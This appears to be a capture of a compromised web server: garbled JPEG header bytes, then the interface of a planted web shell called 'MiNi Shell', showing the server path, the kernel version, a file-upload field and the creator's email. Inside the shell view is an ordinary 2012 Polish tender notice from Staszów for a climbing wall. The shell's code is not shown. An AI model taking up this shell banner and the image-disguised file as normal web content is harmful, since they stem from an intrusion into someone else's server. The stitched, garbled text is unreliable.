JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120613/200598-N-2012.html

<p class="kh_header"><b>Staszów: Zaprojektowanie, dostawa 
i montaż ściany wspinaczkowej w realizowanym obecnie obiekcie budowlanym 
pn.: Powiatowe Centrum Sportowe w Staszowie na dz. nr ewid. 5883/2 przy 
ul. Koszarowej 7 wraz z dostawą wyposażenia oraz przeprowadzenie szkolenia 
z zakresu obsługi dla trzech osób wskazanych przez Zamawiającego</b><br>
<b>Numer ogłoszenia: 200598 - 2012; data zamieszczenia: 13.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Staszowski - Starostwo Powiatowe , ul. Świerczewskiego 7, 28-200 Staszów, woj. świętokrzyskie, tel. 015 8642765, faks 015 8642211.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staszowski.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, dostawa 
i montaż ściany wspinaczkowej w realizowanym obecnie obiekcie budowlanym 
pn.: Powiatowe Centrum Sportowe w Staszowie na dz. nr ewid. 5883/2 przy 
ul. Koszarowej 7 wraz z dostawą wyposażenia oraz przeprowadzenie szkolenia 
z zakresu obsługi dla trzech osób wskazanych przez Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie, dostawa i montaż ściany wspinaczkowej
o powierzchni ok. 140 m2 zgodnie z przedstawionym opisem przedmiotu zamówienia stanowiącym załącznik nr 2 do SIWZ. Ściana wspinaczkowa typu pełnowymiarowego 
o charakterze sportowo - rekreacyjnym.
Opis przedmiotu zamówienia wg kodów CPV:  
37.53.52.91 - 3  Ścianki do wspinania;    37.53.52.20 - 5 Urządzenia do wspinania 

Wykonawca udzieli gwarancji i rękojmi na 36 miesięcy licząc od daty podpisania protokołu odbioru.
UWAGA !
1. Z uwagi na to, iż montaż ściany wspinaczkowej realizowany będzie na obiekcie w budowie, Wykonawca powinien tak zorganizować harmonogram realizacji prac, aby nie powodować zakłóceń pracy pozostałych ekip wykonujących roboty budowlane. Należy uwzględnić zabezpieczenie wykonanych elementów tj.: okna, tynki i podłogi przed uszkodzeniem.
2. Przystępując do realizacji przedmiotu niniejszego zamówienia należy uwzględnić warunki Generalnego Wykonawcy (zwanego dalej GW ) obiektu:
1)	Niezwłocznie po rozstrzygnięciu przetargu i wykonaniu dokumentacji projektowej należy zamontować wszystkie elementy montażowe do posadzki hali sportowej.
2)	Pozostałe elementy montować po stwardnieniu posadzki tj. od dnia 15.07.2012 r.
3)	Z uwagi na to, że posadzka hali wykonana będzie w systemie PULASTIK RDT należy zabezpieczyć posadzkę przed zniszczeniem poprzez np. pokrycie folią budowlaną, zabezpieczenie miejsca montażu ścianki i dojścia z klatki schodowej płytami pilśniowymi w niezbędnej ilości.
4)	Przed przystąpieniem do prac Wykonawca dokona przy udziale Inwestora odbioru pomieszczenia hali sportowej. Od dnia przejęcia pomieszczenia  Wykonawca jest w pełni odpowiedzialny za stan techniczny pomieszczenia hali sportowej oraz elementów wyposażenia. W przypadku uszkodzenia posadzek (sportowej lub ceramicznych), ścian, sufitów, balustrad w trakcie prac montażowych, Wykonawca jest zobowiązany do naprawy wszelkich zniszczeń włącznie z wykonaniem uszkodzonych elementów budynków na nowo bądź dostawie nowych elementów wyposażenia. Naprawy te zobowiązany jest dokonać jedynie za pomocą specjalistycznej firmy, wykonawcy posadzki z uwagi na utrzymanie gwarancji na posadzkę.
5)	Prowadzenie prac związanych z wykonaniem ścianki wspinaczkowej 
w żaden sposób nie może utrudniać prowadzenia prac wykończeniowych 
i porządkowych GW inwestycji. Transport materiałów niezbędnych do wykonania ścianki, komunikacja obywać się będzie wejściem zlokalizowanym od strony południowej w osi 1/(F-G) następnie przez korytarz nr 068 do klatki schodowej w osiach (2-3)/(D-E) prowadzącej bezpośrednio do pomieszczenia hali sportowej. Wykonawca odpowiedzialny będzie za wszelkie uszkodzenia tynków ścian, powłok malarskich, sufitów podwieszanych, zamontowanych urządzeń i elementów wyposażenia na komunikacji, okładzin ceramicznych ścian i posadzek.
6)	Montaż wszelkich konstrukcji ściany wspinaczkowej do ścian budynku
 i posadzek należ każdorazowo uzgadniać z kierownikiem budowy GW. Dotyczy to w szczególności przebiegu wszelkich instalacji elektrycznych p/t 
i sanitarnych. W przypadku kolizji konstrukcji ścianki z wykonanymi instalacjami należy przewidzieć koszt ich przełożenia i przywrócenia elementów budynku do stanu pierwotnego. W przypadku uszkodzeń instalacji wykonawca ścianki zobowiązany jest do naprawy na swój koszt uszkodzonych elementów. 
Naprawy te zobowiązany jest dokonać jedynie za pomocą specjalistycznej firmy z uwagi na utrzymanie gwarancji na powyższe instalacje.
7)	Wykonawca ścianki wspinaczkowej z uwagi na to, że prace będą prowadzone na terenie budowy zobowiązany jest do przestrzegania przepisów bezpieczeństwa i higieny pracy. Do pracy na wysokości dopuszczeni będą pracownicy posiadający wymagane orzeczenie lekarskie, sprzęt użyty do wykonania prac będzie posiadał wymagane dokumenty, będzie sprawny technicznie. Rusztowania użyte do prac montażowych będą zainstalowane przez uprawnionych montażystów, będą posiadały niezbędne protokoły odbiorowe.
8)	Bezwzględnie zakazuje się spożywania napojów alkoholowych na terenie budowy, palenia tytoniu wewnątrz obiektu.
9)	Wykonawca na własny koszt przygotuje materiały niezbędne do zabezpieczenia ścianki przed zniszczeniem, kradzieżą.
10)	GW odpłatnie udostępni niezbędne media na potrzeby realizacji ścianki wspinaczkowej (prąd, woda). Ryczałtowa wartość mediów - 5.000 zł netto plus obowiązujący podatek VAT.

3.	Przedmiotowe prace należy wykonywać z zachowaniem obowiązujących norm technicznych i przepisów ( w szczególności z PN-EN12572-1:2009 
i PN-EN12572-2:2008) oraz przepisów BHP.

4.	Przy określeniu ceny obejmującej przedmiotowe zadanie należy uwzględnić niniejsze informacje, załączone rysunki oraz wnioski wynikające 
z przeprowadzonej wizji lokalnej w terenie. 

5.	 Odpady powstałe w toku realizacji inwestycji należy zagospodarować zgodnie z Ustawą o odpadach (tekst jednolity z 2007 roku w Dz. U. Nr 39. poz. 251 z póź. zm.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.91-3, 37.53.52.20-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium   w  wysokości: 3 000,00 złotych  (trzy tysiące złotych) na zasadach określonych w SIWZ (pkt XV).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy, wg formuły spełnia lub 
nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego posiadania wiedzy i doświadczenia Zamawiający wymaga aby Wykonawca wykazał, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, min. 2 dostawy wraz z montażem ścianki wspinaczkowej wewnętrznej wraz z wyposażeniem o powierzchni minimum 65 m2  każda, oraz załączy dokument potwierdzający, że dostawy te zostały wykonane należycie.
Na potwierdzenie spełniania tego warunku wykonawcy złożą określone  w ogłoszeniu 
i SIWZ oświadczenia lub dokumenty. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazywać, że łącznie spełniają ww. warunek. Warunek będzie oceniany na podstawie złożonych dokumentów uwzględniając zapisy art. 26 ust. 3 ustawy Pzp, wg formuły spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w zakresie dysponowania odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy, wg formuły spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w zakresie osób zdolnych do wykonania zamówienia. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia 
o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy, wg formuły spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w zakresie sytuacji ekonomicznej 
i finansowej. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy, uwzględniając zapisy art. 26 ust.3 ustawy, wg formuły spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)   formularz oferty wg  załącznika Nr 1 do SIWZ,
b) pełnomocnictwo, określające jego zakres w przypadku, gdy Wykonawcę        reprezentuje pełnomocnik (jeżeli dotyczy),
     c)   pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia   publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie   zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego  ubiegania się o udzielenie   niniejszego zamówienia (jeżeli dotyczy).
    d)  dowód wniesienia wadium.
Każdy z wykonawców występujących wspólnie musi złożyć oddzielnie dokumenty wskazane w pkt III.6) ppkt b).
Każdy z wykonawców występujących wspólnie musi złożyć łącznie dokumenty wskazane w pkt III.6) ppkt  a),  c),  d).

Wykonawcy występujący wspólnie.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku składania oferty przez wykonawców występujących wspólnie, wykonawcy ustanowią pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (jeżeli jest wymagane).
Każdy oddzielnie z Wykonawców występujących wspólnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp, a także musi spełniać wymogi, o których mowa w pkt XI. SIWZ, a ich wiedza, doświadczenie, potencjał techniczny i osoby zdolne do wykonania zamówienia oraz sytuacja finansowa oceniane będą łącznie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wprowadzenie zmian treści umowy wymaga formy pisemnej pod rygorem     nieważności. Potrzeba wprowadzenia zmian może wynikać z następujących     okoliczności:
1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)	zmiany terminu realizacji umowy w następujących przypadkach:
a.	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
-   nieterminowe przekazanie terenu budowy przez Zamawiającego;
-   wstrzymanie robót przez Zamawiającego;
- wykonanie przez Zamawiającego prac lub dostaw bez realizacji, których      Wykonawca nie może w sposób należyty wykonywać przedmiotu umowy, 
z przekroczeniem terminów wskazanych dla wykonania tych prac lub dostaw;
-  konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji umowy, 
         b.  Zmiany będące następstwem działania organów administracji w szczególności:
          - przekroczenie zakreślonych przez prawo terminów wydawania przez organy   
            administracji decyzji, zezwoleń, uzgodnień itp.;
          - odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, 
            uzgodnień na skutek błędów w dokumentacji dostarczonej przez Zamawiającego;
        c. inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy 
            skutkujące niemożliwością prowadzenia prac w szczególności:
          - brak możliwości dojazdu oraz transportu materiałów na teren budowy             spowodowany awariami, remontami lub przebudowami dróg dojazdowych
         -  przerwa w dostawie energii elektrycznej, wody, gazu;
     3)   innych, których nie można było przewidzieć w chwili zawarcia umowy.
2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający        może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej       zgody.
3. Zmiany treści umowy dopuszczone w ust. 1 nie mogą prowadzić do zwiększenia      wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.staszowski.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Staszowie, ul. Świerczewskiego 7, 28-200 Staszów, pok. A 218..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Staszowie 
ul. Świerczewskiego 7, 28-200 Staszów kancelaria nr 15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt XII. 
ppkt 5 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub  gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
       Przepis dotyczący terminu wystawienia dokumentu stosuje się odpowiednio jak 
w pkt XII. ppkt 5 SIWZ.
       W przypadku wątpliwości, co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
Zabezpieczenie należytego wykonania umowy.
Wykonawca zobowiązany jest do wniesienia zabezpieczenia należytego wykonania      umowy na  kwotę stanowiącą 5% zaoferowanej ceny brutto podanej w ofercie na zasadach określonych w SIWZ (pkt XXIV)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com